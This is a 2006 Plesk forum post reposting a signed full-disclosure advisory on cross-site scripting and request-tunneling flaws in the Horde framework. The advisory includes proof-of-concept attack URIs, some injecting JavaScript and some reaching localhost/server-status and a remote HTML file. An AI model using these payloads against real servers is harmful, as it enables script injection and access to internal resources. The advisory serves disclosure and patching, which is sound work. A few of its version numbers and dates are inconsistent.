1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Horde Security Vuln???

Discussion in 'Plesk for Linux - 8.x and Older' started by jwgreene, Jul 5, 2006.

  1. jwgreene

    jwgreene Guest

    0
     
    I assume this affects the version packaged with 8.0.1 Hopefully they released the patched release shortly.

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1



    SA0011

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++ Horde 3.1.1, 3.0.10 Multiple Security Issues +++++
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


    PUBLISHED ON
    July 05, 2006


    PUBLISHED AT
    http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
    http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg


    PUBLISHED BY
    Moritz Naumann IT Consulting & Services
    Hamburg, Germany
    http://moritz-naumann.com/

    SECURITY at MORITZ hyphon NAUMANN d0t COM
    GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


    AFFECTED APPLICATION OR SERVICE
    Horde Application Framework
    http://www.horde.org

    The Horde Framework is a common code-base used by Horde
    applications, including libraries and a common user interface.
    The best known Horde application to date is probably IMP, a webbased
    IMAP/SMTP client.


    AFFECTED VERSIONS
    Version 3.0.0 up to and including 3.0.10
    Version 3.1.0 up to and including 3.1.1
    Versions below 3.0.0 have not been examined.


    ISSUES
    Horde is subject to multiple security vulnerabilities, ranging from
    information disclosure to client side script injection (cross site
    scripting) issues.

    +++++ 1. Cross Site Scripting #1
    Horde is subject to a client side script injection vulnerability in
    the URL redirection (dereferrer) function.

    By accessing the following (partial) URI on a web site running an
    affected version with a web browser which is prone to this issue,
    client side script code will be injected into the output generated
    by the application:

    [Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);

    This problem is caused by insufficient validation of user supplied
    input. It is only known to be exploitable on Internet Explorer 6
    (tested on v6.2900.2180 including all patches on Windows XP SP2).
    Internet Explorer 7 beta 3 is not affected.

    +++++ 2. Cross Site Scripting #2
    Horde is subject to a client side script injection vulnerability in
    the help function.

    By accessing the following (partial) URI on a web site running a
    vulnerable version with a web browser which is prone to this issue,
    client side script code will be injected into the output generated
    by the application:


    [Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E

    This problem is caused by insufficient validation of user supplied
    input. All common modern browsers providing Javascript support are
    assumed to be prone to this issue.

    +++++ 3. Cross Site Scripting #3
    Horde is subject to a client side script injection
    vulnerability in the problem reporting function.

    By accessing the following (partial) URI on a web site running a
    vulnerable version with a web browser which is prone to this issue,
    client side script code will be injected into the output generated
    by the application:


    [Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22

    This problem is caused by insufficient validation of user supplied
    input. All common modern browsers providing Javascript support are
    assumed to be prone to this issue.

    +++++ 4. Cross Site Scripting #4, Web tunneling behaviour
    Horde is subject to a server side issue which allows to tunnel HTTP
    GET requests through the application and to inject remotely hosted
    web script into the output generated by the application.

    This behaviour allows for accessing arbitrary locations which are
    addressable using URIs starting with 'http://','https://' or
    'ftp://' protocol handlers. These locations will be accessible from
    within the security context of the web server running an affected
    version of the application. As a result, an attacker may be able to
    access remote locations s/he would not have otherwise access to,
    without disclosing the real source of the request [1]. Additionally,
    insufficiently access restricted local (server-side) or remote (3rd
    party) locations may become available [2].

    By tricking a victim into starting a tunnelling call to a previously
    prepared malicious HTML file, stored in a remote location, which
    contains web script which may be executed on the client side, it is
    possible to extend this into a script injection issue. The injected
    script would be executed by the client within the context of the
    domain the vulnerable web application is hosted in. [3] All common
    modern browsers providing Javascript support are assumed to be prone
    to this issue.

    By accessing the following (partial) URIs on a web site running a
    vulnerable version with a web browser, the behaviours described
    above may be triggered:

    [1]
    [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
    [2]
    [Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
    [3]
    [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html


    BACKGROUND
    Cross Site Scripting (XSS):
    Cross Site Scripting, also known as XSS or CSS, describes
    the injection of malicious content into output produced
    by a web application. A common attack vector is the
    inclusion of arbitrary client side script code into the
    applications' output. Failure to completely sanitize user
    input from malicious content can cause a web application
    to be vulnerable to Cross Site Scripting.

    http://www.owasp.org/index.php/Cross_Site_Scripting
    http://en.wikipedia.org/wiki/XSS
    http://www.cgisecurity.net/articles/xss-faq.shtml


    WORKAROUNDS
    Issues 1-3:
    Client: Disable Javascript.
    Server: Prevent access to vulnerable file(s).
    Issues 1-3:
    Client: Use application as intended only.
    Server: Prevent access to vulnerable file(s).


    SOLUTIONS
    The Horde project has released versions 3.1.2 and 3.1.11 today.
    These are supposed to fix all of the above issues. The updated
    packages are available at http://horde.org/


    TIMELINE
    Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification
    Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement
    Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly
    Jul 05, 2005 Issues 1-4: Public advisory


    NOTES
    This is not related to CVE-2006-2195.


    REFERENCES
    Developers' release announcements
    v3.1.2: http://lists.horde.org/archives/announce/2006/000288.html
    v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html


    ADDITIONAL CREDIT
    N/A


    LICENSE
    Creative Commons Attribution-ShareAlike License Germany
    http://creativecommons.org/licenses/by-sa/2.0/de/

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.3 (GNU/Linux)

    iD8DBQFErDKBn6GkvSd/BgwRAlF7AJ4kjEsFBc2LXp4TgtxQ82OyUK4nBACfZy/U
    31jDwhWrNKdtHXmsdcM1bAk=
    =ENdh
    -----END PGP SIGNATURE-----

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
     
Loading...